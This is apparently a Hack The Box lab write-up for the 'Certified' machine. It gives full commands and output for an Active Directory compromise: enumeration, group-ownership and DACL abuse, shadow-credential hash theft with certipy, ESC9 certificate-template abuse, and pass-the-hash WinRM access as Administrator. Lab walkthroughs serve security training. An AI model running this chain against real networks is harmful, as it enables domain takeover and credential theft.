HTB | Certified
Machine - https://app.hackthebox.com/machines/Certified
Machine Information - As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
NMAP
└─$ nmap -sC -sV -p 53,88,135,139,389,445,464,3268,3269,5985,9389,49667,49689,49690,49691,49720,49741,49776 10.10.11.41 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-09 12:54 IST
Nmap scan report for 10.10.11.41
Host is up (0.59s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-09 14:24:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after: 2105-05-23T21:04:20
|_ssl-date: 2025-08-09T14:26:35+00:00; +7h00m04s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after: 2105-05-23T21:04:20
|_ssl-date: 2025-08-09T14:26:35+00:00; +7h00m04s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-09T14:26:33+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after: 2105-05-23T21:04:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
49776/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-09T14:25:57
|_ start_date: N/A
|_clock-skew: mean: 7h00m03s, deviation: 0s, median: 7h00m03s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 126.55 secondsSMB
We do not have permission to view any interesting shares
└─$ netexec smb certified.htb -u judith.mader -p judith09 --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [*] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share We can get the user list
└─$ netexec smb certified.htb -u judith.mader -p judith09 --users
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\\judith.mader:judith09
SMB 10.10.11.41 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.41 445 DC01 Administrator 2024-05-13 14:53:16 0 Built-in account for administering the computer/domain
SMB 10.10.11.41 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.41 445 DC01 krbtgt 2024-05-13 15:02:51 0 Key Distribution Center Service Account
SMB 10.10.11.41 445 DC01 judith.mader 2024-05-14 19:22:11 0
SMB 10.10.11.41 445 DC01 management_svc 2024-05-13 15:30:51 0
SMB 10.10.11.41 445 DC01 ca_operator 2024-05-13 15:32:03 0
SMB 10.10.11.41 445 DC01 alexander.huges 2024-05-14 16:39:08 0
SMB 10.10.11.41 445 DC01 harry.wilson 2024-05-14 16:39:37 0
SMB 10.10.11.41 445 DC01 gregory.cameron 2024-05-14 16:40:05 0
SMB 10.10.11.41 445 DC01 [*] Enumerated 9 local users: CERTIFIEDBloodhound
└─$ bloodhound-python -u 'judith.mader' -p 'judith09' -d certified.htb -ns 10.10.11.41 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 01M 21S
INFO: Compressing output into 20250809202730_bloodhound.zipFoothold/shell
Shell as management_svc
WriteOwner
On analysing the Bloodhound result, we know:
JUDITH.MADER@CERTIFIED.HTB -> WriteOwner -> MANAGEMENT@CERTIFIED.HTB
and MANAGEMENT_SVC@CERTIFIED.HTB -> MemberOf -> MANAGEMENT@CERTIFIED.HTB
So we will set JUDITH.MADER@CERTIFIED.HTB as the group owner of MANAGEMENT@CERTIFIED.HTB
└─$ bloodyAD --host 10.10.11.41 -d certified.htb -u 'judith.mader' -p 'judith09' set owner management judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on managementNext, I need to give judith.mader the full control over the groups:
└─$ impacket-dacledit -action write -rights FullControl -target 'management' -principal 'judith.mader' certified.htb/'judith.mader':'judith09' -dc-ip 10.10.11.41
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250809-210119.bak
[*] DACL modified successfully!Let’s add ourselves
└─$ bloodyAD --host 10.10.11.41 -d certified.htb -u 'judith.mader' -p 'judith09' add groupMember management 'judith.mader'
[+] judith.mader added to managementGenericWrite
Since Management have GenericWrite over Management_svc we can either use Targeted Kerberos or shadow credentials
We will be doing Shadow Credential to get the hash
└─$ certipy shadow auto -account 'management_svc' -u 'judith.mader@certified.htb' -p 'judith09' -dc-ip 10.10.11.41
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'cae378b3cb274386b4a26c37f2b62448'
[*] Adding Key Credential with device ID 'cae378b3cb274386b4a26c37f2b62448' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'cae378b3cb274386b4a26c37f2b62448' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584Since Management_svc is a Member Of Remote Management Users we can winrm
and we are in and got the user.txt
└─$ evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\management_svc\\Documents> dir ..\\Desktop
Directory: C:\\Users\\management_svc\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/9/2025 7:13 AM 34 user.txt
Privilege Escalation
GenericAll
Now we can use shadow credentials to get the hash for the CA_operator
└─$ certipy shadow auto -account ca_operator -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4b220ea59d294026bcc588810decf172'
[*] Adding Key Credential with device ID '4b220ea59d294026bcc588810decf172' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '4b220ea59d294026bcc588810decf172' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_operator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_operator.ccache'
[*] Wrote credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2
ESC 9
we found ESC9
└─$ certipy find -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -target 10.10.11.41 -text -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D
Certificate Validity Start : 2024-05-13 15:33:41+00:00
Certificate Validity End : 2124-05-13 15:43:41+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CERTIFIED.HTB\\Administrators
Access Rights
ManageCa : CERTIFIED.HTB\\Administrators
CERTIFIED.HTB\\Domain Admins
CERTIFIED.HTB\\Enterprise Admins
ManageCertificates : CERTIFIED.HTB\\Administrators
CERTIFIED.HTB\\Domain Admins
CERTIFIED.HTB\\Enterprise Admins
Enroll : CERTIFIED.HTB\\Authenticated Users
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectRequireDirectoryPath
Enrollment Flag : PublishToDs
AutoEnrollment
NoSecurityExtension
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-05-13T15:48:52+00:00
Template Last Modified : 2024-05-13T15:55:20+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED.HTB\\operator ca
CERTIFIED.HTB\\Domain Admins
CERTIFIED.HTB\\Enterprise Admins
Object Control Permissions
Owner : CERTIFIED.HTB\\Administrator
Full Control Principals : CERTIFIED.HTB\\Domain Admins
CERTIFIED.HTB\\Enterprise Admins
Write Owner Principals : CERTIFIED.HTB\\Domain Admins
CERTIFIED.HTB\\Enterprise Admins
Write Dacl Principals : CERTIFIED.HTB\\Domain Admins
CERTIFIED.HTB\\Enterprise Admins
Write Property Enroll : CERTIFIED.HTB\\Domain Admins
CERTIFIED.HTB\\Enterprise Admins
[+] User Enrollable Principals : CERTIFIED.HTB\\operator ca
[!] Vulnerabilities
ESC9 : Template has no security extension.
[*] Remarks
ESC9 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
ESC9 vulnerabilities arise when a certificate template is explicitly configured not to include the
szOID_NTDS_CA_SECURITY_EXT(OID1.3.6.1.4.1.311.25.2) security extension in the certificates it issues. This extension, which contains the requester's SID, was introduced by Microsoft as part of the May 2022 "Certifried" updates (CVE-2022-26923 and KB5014754) to enable "strong certificate mapping". Strong mapping allows DCs to reliably and securely map a presented client certificate to a specific user or computer account in Active Directory using its SID.
ESC9 can be exploited in a couple of primary ways:
With UPN Manipulation (in Compatibility Mode or Disabled Mode)
Combined with ESC6 (CA allows SAN specification)
We will use 1st method
Step 1: Read initial UPN of the victim account (Optional - for restoration).
└─$ certipy account -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip '10.10.11.41' -user 'Administrator' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=certified,DC=htb
name : Administrator
objectSid : S-1-5-21-729746778-2675978091-3820388244-500
sAMAccountName : Administrator
userAccountControl : 66048
whenCreated : 2024-05-13T15:02:18+00:00
whenChanged : 2025-08-09T14:13:08+00:00Step 2: Update the victim account's UPN to the target administrator's sAMAccountName.
Since management_svc had GenericAll over ca_operator, which means full control over that AD object. That includes the ability to Change userPrincipalName
└─$ certipy account -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip '10.10.11.41' -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : administrator
[*] Successfully updated 'ca_operator'Step 3: Request a certificate as the "victim" user from the ESC9 template.
└─$ certipy req -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip '10.10.11.41' -ca 'certified-DC01-CA' -template 'CertifiedAuthentication'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'Step 4: Revert the "victim" account's UPN
└─$ certipy account -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip '10.10.11.41' -upn 'ca_operator' -user 'ca_operator' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator
[*] Successfully updated 'ca_operator'Step 5: Authenticate as the target administrator.
└─$ certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34Now i can winrm via hash and get the root.txt
└─$ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> dir ..\\Desktop
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/9/2025 7:13 AM 34 root.txt
Last updated